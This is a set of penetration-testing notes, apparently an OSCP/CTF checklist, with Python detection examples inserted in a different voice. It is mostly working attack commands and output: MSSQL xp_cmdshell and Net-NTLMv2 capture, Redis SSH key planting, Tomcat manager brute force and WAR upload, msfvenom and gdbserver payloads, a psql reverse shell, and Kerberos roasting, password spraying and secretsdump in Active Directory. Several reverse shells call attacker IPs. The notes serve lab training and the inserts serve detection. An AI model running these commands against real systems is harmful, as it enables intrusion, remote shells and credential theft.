look for user generated tables on those databases:
☐ use volume (or whatever other names come from the command above)
SELECT name FROM sysobjects WHERE xtype = 'U'
Shell with xp_dirtree
I’ll use xp_dirtree to load a file, and I’ll tell the db that the file is in an SMB share on my hosts. The server will try to authenticate to my host, where responder will collect the Net-NTLMv2. For more details, check out the [Giddy writeup] and/or [my post on Net-NTLMv2].
start responder:
☐ responder -I tun0
issue the connect to load a file using xp_dirtree from an SMB share (that doesn’t exist) on my host:
☐ SQL> xp_dirtree '\\10.10.14.14\a';
Now crack it:
hashcat -m 5600 mssql-svc.netntlmv2 /usr/share/wordlists/rockyou.txt -o mssql-svc.netntlmv2.cracked --force
xp_cmdshell
xp_cmdshell is a way to run commands directly on the machine. With every account you get, always try:
☐ xp_cmdshell whoami
Note: the actual syntax to run a command is EXEC xp_cmdshell '[command]';. However, the client I'm using to connect, mssqlclient.py, has a built-in command to run a command over xp_cmdshell, so I can just type xp_cmdshell [command].
☐ xp_cmdshell \\192.168.49.142\share\nc64.exe -e cmd.exe 192.168.49.142 443
You might not be able to run xp_cmdshell, but you might be able to activate it then run it. Try:
☐ enable_xp_cmdshell
xp_cmdshell whoami
☐ xp_cmdshell \\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 443
xp_cmdshell “powershell -e JAB...........”
Check out the port forwarding (ligolo) notes on how to set up a port forward in case the target is in an internal network.
RDesktop 3389
Log in from Kali with rdesktop ipaddress
☐ hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
Distccd 3632
Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed.
Check if it's vulnerable to CVE-2004-2687 to execute arbitrary code:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
SVN 3690
Subversion is one of many version control options available today. It's often abbreviated as SVN. Subversion is used for maintaining current and historical versions of projects. Subversion is an open source centralized version control system. It's licensed under Apache. It's also referred to as a software version and revisioning control system.
☐ svn help shows all commands you can use to interact with this service.
☐ svn ls svn://10.10.10.10
svn log svn://10.10.10.10
☐ If you have multiple revisions, see if there are different files between them with svn up -r 2 (-r 2 being which revision you want to change into) and it should download those files and delete any files that do not match the new revision
svn checkout svn://10.10.10.10
☐ might need to add an entry to /etc/hosts
if you ls now you should see the files downloaded locally
James Mail Server 25/110/119/4555
James Mail Server is listening on four ports with different functions. Simple Mail Transfer Protocol (SMTP) on TCP 25, Post Office Protocol (POP3) on TCP 110, and Network News Transfer Protocol (NNTP) on TCP 119 are all services that this box is offering. I could look at potentially brute forcing valid user names or sending phishing emails, but first I want to look at port 4555.
I can connect to 4555 with nc, and I’m prompted to login. The default creds of root/root work:
☐ nc 10.10.10.51 4555
I can get the list of commands with help:
☐ help
I can list users to see five accounts:
☐ listusers
I can change the password for each:
☐ setpassword -h
setpassword james 0xdf0xdf
For each account, I can now connect to TCP 110 (POP3) to check mail. telnet works best to connect to POP3. The first user, james, has no messages:
☐ telnet 10.10.10.51 110
USER james
PASS 0xdf0xdf
LIST
I'll quit (CTRL+] followed by entering quit), and move on to the next user. No mail in thomas either, but john does show one message.
I’ll use the RETR command to read it:
☐ RETR 1 ( if LIST shows number 2, then you have two emails to check with RETR 1 and RETR 2 etc...)
Redis 6379
I can interact with Redis just using nc. I can run keys to list the current keys:
☐ nc 10.10.10.160 6379
☐ keys * (keys needs the * pattern argument to list everything)
Use redis-cli for a cleaner interface:
☐ apt-get install redis-tools
☐ keys * (keys needs the * pattern argument to list everything)
Add something:
☐ incr cookie
☐ keys * (keys needs the * pattern argument to list everything)
get cookie
Write SSH key with Redis:
depending on the output, you might have to change to a different user's directory
☐ config get dir
☐ config set dir ./.ssh to change from your current directory into a subdirectory of it. If it works, the folder exists
config get dir again to confirm you successfully changed directories
generate a key with ssh-keygen, and then add it to a file with some extra newlines before and after the key:
☐ (echo -e "\n\n"; cat ~/id_rsa_generated.pub; echo -e "\n\n") > spaced_key.txt
Redis is going to write a binary database file into authorized_keys, where sshd is then going to open that file as an ASCII text file and read it line by line, looking for a public key that matches the private key being sent to it. The newlines will help make sure that the public key is on its own line in the file.
I can use the -x option in redis-cli, which will “read the last argument from STDIN”, to cat this file into redis-cli and set its value in the database:
☐ cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set cookie
tell redis that the dbfilename is authorized_keys, and then save:
☐ config set dbfilename "authorized_keys"
save
☐ ssh -i ~/id_rsa_generated redis@10.10.10.160
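The mechanism above (an RDB dump that sshd tolerates because it reads authorized_keys line by line) is also what an audit of the file should look for. The following is an added defensive example, not code from the notes or from 0xdf: it classifies each line of an authorized_keys file and flags RDB magic and binary lines. The sample file, key material and comments are constructed.

```python
"""Added defensive example (not from the original notes): scan an
authorized_keys file for lines that are not well-formed OpenSSH public
keys and for the RDB header a Redis 'save' leaves behind."""
import base64
import re
import struct

KEY_TYPES = {
    "ssh-rsa", "ssh-dss", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
}
RDB_MAGIC = b"REDIS"                       # first bytes of every RDB dump file
PRINTABLE = re.compile(rb"^[\x20-\x7e\t]*$")


def parse_key_line(line: str):
    """Return (key_type, comment) if `line` is a well-formed public key line,
    else None.  Options such as from="..." may precede the key type, so the
    type is located by token rather than by position, and the base64 blob
    must start with the same type string in OpenSSH wire format."""
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if tok in KEY_TYPES and i + 1 < len(tokens):
            try:
                blob = base64.b64decode(tokens[i + 1], validate=True)
            except ValueError:             # binascii.Error is a ValueError
                return None
            if len(blob) < 4:
                return None
            n = struct.unpack(">I", blob[:4])[0]
            if blob[4:4 + n] != tok.encode():
                return None
            return tok, " ".join(tokens[i + 2:])
    return None


def audit_authorized_keys(data: bytes) -> dict:
    """Classify each line of an authorized_keys file.  Lines with binary
    bytes or that are not key lines are reported as suspicious; RDB magic
    anywhere in the file is a strong sign it was written by a Redis 'save'."""
    report = {"keys": [], "suspicious": [], "rdb_dump": RDB_MAGIC in data}
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        if not raw.strip():
            continue                        # blank lines are harmless
        if not PRINTABLE.match(raw):
            report["suspicious"].append((lineno, "binary bytes"))
            continue
        line = raw.decode("ascii")
        if line.lstrip().startswith("#"):
            continue                        # comment line
        parsed = parse_key_line(line)
        if parsed is None:
            report["suspicious"].append((lineno, "not a public key line"))
        else:
            report["keys"].append((lineno,) + parsed)
    return report


def ed25519_line(pub: bytes, comment: str) -> str:
    """Build a valid ssh-ed25519 authorized_keys line (constructed key bytes)."""
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", len(pub)) + pub
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


# Constructed sample: one legitimate key, then what a Redis 'save' into the
# file leaves around a planted key (RDB header, padding newlines, trailer).
LEGIT = ed25519_line(b"\x01" * 32, "admin@workstation")
PLANTED = ed25519_line(b"\x02" * 32, "oxdf@hacky")
SAMPLE = (
    LEGIT.encode() + b"\n"
    + b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x06cookie\x4c\n\n\n"
    + PLANTED.encode() + b"\n\n\n"
    + b"\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0\n"
)

if __name__ == "__main__":
    for k, v in audit_authorized_keys(SAMPLE).items():
        print(f"{k}: {v}")
```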
Tomcat 8080
Port scanning to identify Tomcat
Let's scan the target machine (canyoupwnme) with nmap
$ nmap -A -T4 -sT -p1-65535 canyoupwnme
...
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
...
Check what is available
With your browser, open the URL
http://canyoupwnme:8080/manager
It seems that Tomcat's management console is available, but authentication is needed. Metasploit can help us...
Brute forcing the Tomcat's management console
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rhosts canyoupwnme
msf auxiliary(tomcat_mgr_login) > set rport 8080
msf auxiliary(tomcat_mgr_login) > exploit
[!] No active DB -- Credential data will not be saved!
[-] 10.0.100.195:8080 TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: )
[-] 10.0.100.195:8080 TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: )
...
[+] 10.0.100.195:8080 - LOGIN SUCCESSFUL: tomcat:tomcat
...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) > quit
Yep! Credentials tomcat:tomcat were found. Still using Metasploit, we can upload a crafted .WAR in order to get a meterpreter session.
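On the server side, that brute force and the WAR deploy both land in Tomcat's access log. The following is an added defensive example, not code from the walkthrough: detection logic over access-log lines in Tomcat's default "%h %l %u %t "%r" %s %b" pattern. The log lines, IPs and application path below are constructed.

```python
"""Added defensive example (not from the original page): flag manager-app
credential guessing, a success after failures, and PUT/DELETE requests in
Tomcat access-log lines."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
RISKY_METHODS = {"PUT", "DELETE"}   # the methods nmap reported as potentially risky


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def analyze(lines, threshold=5, window_s=60):
    """Return (kind, ip, detail) alerts for: repeated 401s on /manager from one
    source (credential guessing), a 200 on /manager after such failures
    (a guess succeeded), and any PUT/DELETE (deploying or removing content)."""
    alerts = []
    failures = defaultdict(list)     # ip -> timestamps of recent 401s on /manager
    reported = set()                 # ips already reported for guessing
    for r in filter(None, map(parse_line, lines)):
        ip, on_manager = r["ip"], r["path"].startswith("/manager")
        if r["method"] in RISKY_METHODS:
            alerts.append(("risky_method", ip, f'{r["method"]} {r["path"]} -> {r["status"]}'))
        if on_manager and r["status"] == 401:
            recent = [t for t in failures[ip] if (r["ts"] - t).total_seconds() <= window_s]
            recent.append(r["ts"])
            failures[ip] = recent
            if len(recent) >= threshold and ip not in reported:
                reported.add(ip)
                alerts.append(("manager_bruteforce", ip, f"{len(recent)} 401s within {window_s}s"))
        elif on_manager and r["status"] == 200 and failures[ip]:
            alerts.append(("login_after_failures", ip, f'user={r["user"]} after {len(failures[ip])} failures'))
            failures[ip] = []
    return alerts


# Constructed sample: one ordinary visitor, six bad guesses on the manager
# app from 10.0.100.245, a successful login as "tomcat", then a PUT deploy
# of an application named "app".
SAMPLE_LOG = [
    '10.0.100.250 - - [18/Apr/2016:13:33:20 +0200] "GET / HTTP/1.1" 200 11156',
] + [
    f'10.0.100.245 - - [18/Apr/2016:13:33:{30 + i} +0200] "GET /manager/html HTTP/1.1" 401 2473'
    for i in range(6)
] + [
    '10.0.100.245 - tomcat [18/Apr/2016:13:33:40 +0200] "GET /manager/html HTTP/1.1" 200 15231',
    '10.0.100.245 - tomcat [18/Apr/2016:13:33:41 +0200] "PUT /manager/text/deploy?path=/app HTTP/1.1" 200 32',
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```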
Starting a meterpreter session
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(tomcat_mgr_upload) > set username tomcat
msf exploit(tomcat_mgr_upload) > set password tomcat
msf exploit(tomcat_mgr_upload) > set rhost canyoupwnme
msf exploit(tomcat_mgr_upload) > set rport 8080
msf exploit(tomcat_mgr_upload) > exploit
[*] Started reverse TCP handler on 10.0.100.245:4444
[*] canyoupwnme:8080 - Retrieving session ID and CSRF token...
[*] canyoupwnme:8080 - Uploading and deploying Hv5hJD7sAuzbRX3UGWiOctD6yz3j...
[*] canyoupwnme:8080 - Executing Hv5hJD7sAuzbRX3UGWiOctD6yz3j...
[*] canyoupwnme:8080 - Undeploying Hv5hJD7sAuzbRX3UGWiOctD6yz3j ...
[*] Sending stage (45741 bytes) to 10.0.100.195
[*] Meterpreter session 1 opened (10.0.100.245:4444 -> 10.0.100.195:52043) at 2016-04-18 13:33:40 +0200
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)
Becoming root
On the attacker machine, download and configure a Perl reverse shell
$ wget http://pentestmonkey.net/tools/perl-reverse-shell/perl-reverse-shell-1.0.tar.gz
$ tar zxvf perl-reverse-shell-1.0.tar.gz
$ cd perl-reverse-shell-1.0
$ vim perl-reverse-shell.pl # set IP and PORT at lines 45 and 46
Once prepared, upload the reverse shell on the target machine using the meterpreter
meterpreter > upload perl-reverse-shell.pl /tmp/perl-reverse-shell.pl
[*] uploading : perl-reverse-shell.pl -> /tmp/perl-reverse-shell.pl
[*] uploaded : perl-reverse-shell.pl -> /tmp/perl-reverse-shell.pl
On the attacker machine, start listening
$ nc -nvp 9876
listening on [any] 9876 ...
while on the victim machine, execute the Perl script
meterpreter > shell
Process 2 created.
Channel 3 created.
perl /tmp/perl-reverse-shell.pl
Content-Length: 0
Connection: close
Content-Type: text/html
Content-Length: 43
Connection: close
Content-Type: text/html
Sent reverse shell to 10.0.100.245:9876<p>
On the attacker machine you should see something like this
connect to [10.0.100.245] from canyoupwnme.pentest [10.0.100.195] 53929
12:24:48 up 55 min, 0 users, load average: 0.00, 0.01, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)
/
/usr/sbin/apache: 0: can't access tty; job control turned off
$
Spawn a tty shell
$ python -c "import pty; pty.spawn('/bin/bash');"
tomcat7@canyoupwnme:/$ whoami
whoami
tomcat7
tomcat7@canyoupwnme:/$ id
id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)
$ mkdir tmp
$ cd tmp
$ wget https://www.exploit-db.com/download/39166 -O ofs.c
$ gcc ofs.c -o ofs.bin
$ ./ofs.bin
# id
# uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(sambashare),115(lpadmin),1000(user)
GDB
Upload Rev Shell Elf
Hacktricks has a page on exploiting gdbserver. I suspect at least the first technique was tested on Backdoor (given the use of port 1337 and the location of /home/user). This technique is to create an elf, and then upload it to the remote debugger and run it there.
I’ll create a simple reverse shell payload with msfvenom:
oxdf@hacky$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 PrependFork=true -f elf -o rev.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 106 bytes
Final size of elf file: 226 bytes
Saved as: rev.elf
Next, I’ll start debugging it locally:
oxdf@hacky$ gdb -q rev.elf
Reading symbols from rev.elf...
(No debugging symbols found in rev.elf)
(gdb)
Now connect to the remote server:
(gdb) target extended-remote 10.10.11.125:1337
Remote debugging using 10.10.11.125:1337
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
Reading /lib64/ld-2.31.so from remote target...
Reading /lib64/.debug/ld-2.31.so from remote target...
Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
(No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2
With that connection, I can upload the binary:
(gdb) remote put rev.elf /dev/shm/rev
Successfully sent file "rev.elf".
Now I just need to set the remote debugging target to that file, and run it:
(gdb) set remote exec-file /dev/shm/rev
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program:
Reading /dev/shm/rev from remote target...
Reading /dev/shm/rev from remote target...
Reading symbols from target:/dev/shm/rev...
(No debugging symbols found in target:/dev/shm/rev)
[Detaching after fork from child process 33603]
[Inferior 1 (process 33592) exited normally]
When that finishes, there’s a connection at my listening nc:
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.125 46586
id
uid=1000(user) gid=1000(user) groups=1000(user)
I’ll do a shell upgrade with script:
script /dev/null -c bash
Script started, file is /dev/null
user@Backdoor:/home/user$ ^Z
[1]+ Stopped nc -lnvp 443
oxdf@hacky$ stty raw -echo ; fg
nc -lnvp 443
reset
reset: unknown terminal type unknown
Terminal type? screen
user@Backdoor:/home/user$
I’m told that there may be issues running gdb with a different version than the server. I didn’t have any issues, but in this case my VM and the target are both Ubuntu 20.04. If you have issues from Kali or Parrot, that may be the problem.
IRC 6697/8067/65534
use hexchat to interact with these chats (it is a graphical program, so launch it from the application menu like Burp rather than from the command line)
☐ Create a network named after the box. Make your username root or whatever.
☐ select the network and click Edit, then update the server to point to 10.10.10.10/6697
Select the name of the chat and click Connect, then click Open the channel list.
psql 5432
CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.186 80 >/tmp/f';
Active Directory
Enumeration Checklist:
♦ What is the domain?
SMB CrackMapExec
☐ crackmapexec smb 10.10.10.10 will always show the host name and domain name. Add this to your /etc/hosts file
☐ Add any host names you find in enumeration to the /etc/hosts file in the format 10.10.10.10 hostname.domainname.com hostname
Also add the domain to the domain controller IP in your /etc/hosts file in the format 10.10.10.10 domainname.com
♦ What is the host name? Is DNS running on port 53?
SMB CrackMapExec
☐ crackmapexec smb 10.10.10.10 will always show the host name and domain name. Add this to your /etc/hosts file
Zone Transfer
☐ dig axfr @10.10.10.10 domain.htb try this before doing the below commands. Only do below if you are desperate on enumeration
☐ you need the domain.htb value, so guess it if you do not know it
Nslookup
☐ If it does not appear in nmap you can try starting nslookup with nslookup and setting the server value to your target with server 10.10.10.10
☐ If it hangs then it is time to move onto dnsrecon - try your local host 127.0.0.1 as the value to verify it even works
DNS
☐ dnsenum will also attempt to look up any info, bruteforce subdomains, and attempt zone transfers: dnsenum --dnsserver 10.10.10.248 -f /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -o scans/dnsenum-bitquark-intelligence.htb intelligence.htb (dnsenum version 1.2.6)
♦ Got a list of names to check?
We can first take our list of first name last name and turn it into the most popular naming conventions for AD
Go to /programs/kerbrute, put your list of names into NamesForADGenerator.txt in firstname,lastname order, then run:
☐ python3 ADGenerator.py NamesForADGenerator.txt
Use this new file of potential usernames and Kerbrute to validate them.
☐ ./kerbrute_linux_amd64 userenum --dc iphere -d domain.name usernamesfromgenerator.txt
If you get no results, sync up your time with ntpdate 10.10.10.10. All negatives could mean it is failing just because your clock does not match the DC
♦ Is Kerberos open on port 88?
Kerbrute - syntax 1
Without creds, one thing I can check on Kerberos is brute-forcing user names.
☐ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
If you do get any hits try and understand the naming convention to help in future bruteforcing
Kerbrute - syntax 2
we can try and bruteforce any username and password or use gathered usernames against possible passwords. For this we will use kerbrute in /programs/kerbrute. This program can also just be used to verify that usernames are valid on the domain. Use Filtering to help create a username list from recon.
☐ sync up your time: ntpdate 10.10.10.10
☐ run ./kerbrute_linux_amd64 -h to see the flags you need, like -d for the full domain or --dc for the domain controller
☐ User Enumeration ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
Password Spray ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
Brute User ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
Brute Force ./kerbrute_linux_amd64 bruteforce -d lab.ropnop.com - reads username and password combinations (format username:password) from a file or stdin
use /usr/share/seclists for huge username and password lists
ASREP-Roasting
with Kerberos if I manage to find usernames I can try ASREP-roasting which can be abused if a user has the don't require preauth flag set.
☐ GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
GetNPUsers.py -no-pass -dc-ip 10.10.10.248 intelligence.htb/Jose.Williams
☐ hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt --force
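Both the username sweep above and ASREP-roasting leave Kerberos TGT request events (Windows Security event 4768) on the DC. The following is an added defensive example, not code from the notes or from 0xdf: detection logic over 4768 records using the real EventData field names (TargetUserName, IpAddress, Status, PreAuthType, TicketEncryptionType); the sample events and IPs are constructed.

```python
"""Added defensive example (not from the original notes): detection over
Windows 4768 (Kerberos TGT requested) records for username sweeps and for
AS-REP roasting of accounts that do not require pre-authentication."""
from collections import defaultdict

RC4_HMAC = "0x17"           # TicketEncryptionType for RC4: the crackable AS-REP form
AES256 = "0x12"
NO_PREAUTH = "0"            # PreAuthType 0: no pre-authentication performed
PA_ENC_TIMESTAMP = "2"      # PreAuthType 2: the normal encrypted-timestamp pre-auth
STATUS_OK = "0x0"
PRINCIPAL_UNKNOWN = "0x6"   # KDC_ERR_C_PRINCIPAL_UNKNOWN: no such account


def detect_asrep_roast(events):
    """A successful 4768 with PreAuthType 0 means the account does not require
    pre-authentication; with RC4 the returned AS-REP is what hashcat -m 18200
    cracks.  Returns (source ip, account) for each such request."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e["Status"] == STATUS_OK
            and e["PreAuthType"] == NO_PREAUTH
            and e["TicketEncryptionType"] == RC4_HMAC]


def detect_user_enum(events, min_distinct=10, min_unknown_ratio=0.5):
    """A username sweep shows as one source asking for TGTs for many distinct
    names, most of them unknown to the KDC (0x6).  Returns
    (ip, distinct_names, unknown_count) for each flagged source."""
    names = defaultdict(set)
    total = defaultdict(int)
    unknown = defaultdict(int)
    for e in events:
        ip = e["IpAddress"]
        names[ip].add(e["TargetUserName"].lower())
        total[ip] += 1
        if e["Status"] == PRINCIPAL_UNKNOWN:
            unknown[ip] += 1
    return [(ip, len(names[ip]), unknown[ip]) for ip in names
            if len(names[ip]) >= min_distinct
            and unknown[ip] / total[ip] >= min_unknown_ratio]


def ev(ip, user, status, preauth, etype):
    """Build one 4768 EventData record (constructed sample data)."""
    return {"IpAddress": ip, "TargetUserName": user, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed sample: a workstation logging on normally, a sweep of 12 names
# from 10.10.14.6 (10 unknown, 2 real), and an RC4 no-preauth request for a
# service account from the same source.  Failed requests carry the "-" and
# 0xffffffff placeholders the event uses.
SAMPLE_EVENTS = (
    [ev("10.10.10.50", "jsmith", STATUS_OK, PA_ENC_TIMESTAMP, AES256)] * 3
    + [ev("10.10.14.6", f"user{i:02d}", PRINCIPAL_UNKNOWN, "-", "0xffffffff")
       for i in range(10)]
    + [ev("10.10.14.6", "jsmith", STATUS_OK, PA_ENC_TIMESTAMP, AES256),
       ev("10.10.14.6", "fsmith", STATUS_OK, PA_ENC_TIMESTAMP, AES256),
       ev("10.10.14.6", "svc_backup", STATUS_OK, NO_PREAUTH, RC4_HMAC)]
)

if __name__ == "__main__":
    print("AS-REP roast candidates:", detect_asrep_roast(SAMPLE_EVENTS))
    print("username sweeps:", detect_user_enum(SAMPLE_EVENTS))
```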
♦ Is LDAP open on port 389/636?
☐ ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts to get name information
we can also try searching with the dc, which the command above should also reveal, ldapsearch -h 10.10.10.248 -x -b "DC=intelligence,DC=htb"
☐ ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-anonymous to dump all info to a file
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-people to dump just people to a file
If you have credentials you can dump everything
☐ ldapdomaindump <IP> -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
☐ Search through the json files, not the html, as more data fields show up in the json files
Dump all info into a file, or second command just dumps users
☐ ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-anonymous
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-people
♦ Is SMB open on port 135/139/445?
☐ smbclient -L //10.10.10.10 (-L lists shares; ADMIN$ C$ IPC$ are all default shares)
smbclient -U '' -L //10.10.10.10 try guest, anonymous and blank for the value of -U
☐ smbclient -N -L //10.10.10.10
☐ crackmapexec smb 172.16.115.6 -d relia.com -u jim -p 'Castello1!' --shares -M spider_plus
☐ cat /tmp/cme_spider_plus/172.16.115.6.json | jq '. | map_values(keys)'
☐ smbmap -H 10.10.10.10
smbmap -H 10.10.10.237 -u cookie -p cookie to try and login as a user that does not exist
☐ smbmap -R Replication -H 10.10.10.10 will recursively list all the files of that share
add -A Groups.xml -q to the end of the above command to search for all files with that name and download them
☐ If it is old and you find a Groups.xml use gpp-decrypt hashhere to decrypt passwords you may find
☐ smbclient -U relia\\jim //172.16.115.21/monitoring you have to add the domainname\\ before the username to log into AD smb
☐ If you get errors about "NT_STATUS_PASSWORD_MUST_CHANGE" follow the RPC steps below to change the password
☐ run allinfo filename.txt on a file that appears to be zero bytes to see if it has any alternative data streams
☐ you can get it with get "Password.txt:Password" where the part after the colon specifies the alternate data stream to get
RPC
☐ rpcclient -U '' -N 10.10.10.10 (troubleshoot by removing -N)
Run a few commands; if you get responses, look up enumeration for this or look in MSRPC. If you only get access denied there is nothing here
☐ run command enumdomusers and srvinfo in rpc
☐ copy the names, if it is successful, and use cat users.txt | awk -F\[ '{print $2}' | awk -F \] '{print $1}' > justnames.txt to strip them
Checkout descriptions of users with querydispinfo or for just one user use queryuser 0x1f4 (this number will be shown in enumdomusers)
☐ run command setuserinfo2 user_name 23 'NewPassword123' in rpc to attempt a password change of a known user with a previously known password
☐ You can also attempt to reset a password with smbpasswd -U user_name -r 10.10.10.10
♦ What can we bruteforce?
Crack Map Exec
one option of the crack map exec suite is to bruteforce smb. We can use usernames gathered from enumeration and a password list from cewl or Hashcat
☐ crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt --continue-on-success
crackmapexec winrm 10.10.10.10 -u users.txt -p pw.txt --continue-on-success will bruteforce a list of usernames and passwords. Use --no-bruteforce to match the first username to the first password and so on. Otherwise it will bruteforce every username against every password which could lock accounts out. ports 5985 and 5986 must be open
☐ add the --local-auth flag to do local authentication instead. This is useful if you have new creds but they do not seem to unlock anything.
If The Above Fail Try Hydra
☐ hydra -L knownusernames -P knownpasswords -r rdp://172.16.244.12 as I have gotten many false negatives especially when bruteforcing rdp
Kerbrute
☐ Check out Kerbrute under "Is Kerberos open on port 88?" above
♦ Do we have credentials of some kind?
Even if you cannot crack the credential material you have, like an NTLM hash, use it in the same way as a password with cme
☐ crackmapexec smb/winrm/rdp/ssh/ 10.10.10.10 -u username -H hashhere --continue-on-success
SecretsDump.py
reads SAM and LSA secrets from the registry, dumps NTLM hashes, plaintext credentials, and Kerberos keys, and dumps NTDS.dit
☐ secretsdump.py thepastamentors.com/NoodleSVC@10.10.10.15
ASREP-Roasting
with Kerberos if I manage to find usernames I can try ASREP-roasting which can be abused if a user has the don't require preauth flag set.
☐ GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
GetNPUsers.py -no-pass -dc-ip 10.10.10.248 intelligence.htb/Jose.Williams
☐ hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt --force
GetADUsers
If we get a username and a password/hash we can use GetADUsers.py to enumerate the domain more
☐ GetADUsers.py -all -dc-ip 10.10.10.10 active.htb/user_name:password_here add a hash you have with -hashes and remove :password_here
If you get an error try removing :password_here and inputting the password on prompt after running the command
Psexec
Is our user admin on any share, so that we can get a shell with psexec?
☐ psexec.py active.htb/user_name@10.10.10.10 and enter password on prompt. Should enumerate through all shares with credentials
SMB
Does our user have new access to an smb share we previously did not?
☐ crackmapexec smb 10.10.10.10 -u usersname -p password
☐ crackmapexec smb 10.10.10.10 -u usersname -p password -M spider_plus to automatically crawl through shares and list files you have access to
use cat /tmp/cme_spider_plus/10.10.10.10.json | jq '. | map_values(keys)' to list all files in shares from this spider crawl
☐ smbmap -d active.htb -u user_name -p passwordhere123 -H 10.10.10.10
☐ Add the 10.10.10.10/ShareName -R at the end of the above command to list all files your user has access to
☐ smbclient -U relia\\jim //172.16.115.21/monitoring you have to add the domainname\\ before the username to log into AD smb
GetUserSPNs
Use the GetUserSPNs.py script from Impacket to get a list of service usernames which are associated with normal user accounts
☐ GetUserSPNs.py -request -dc-ip 10.10.10.10 active.htb/user_name -save -outputfile GetUserSPNs.out
☐ If you get a hash crack it with hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force
WinRM
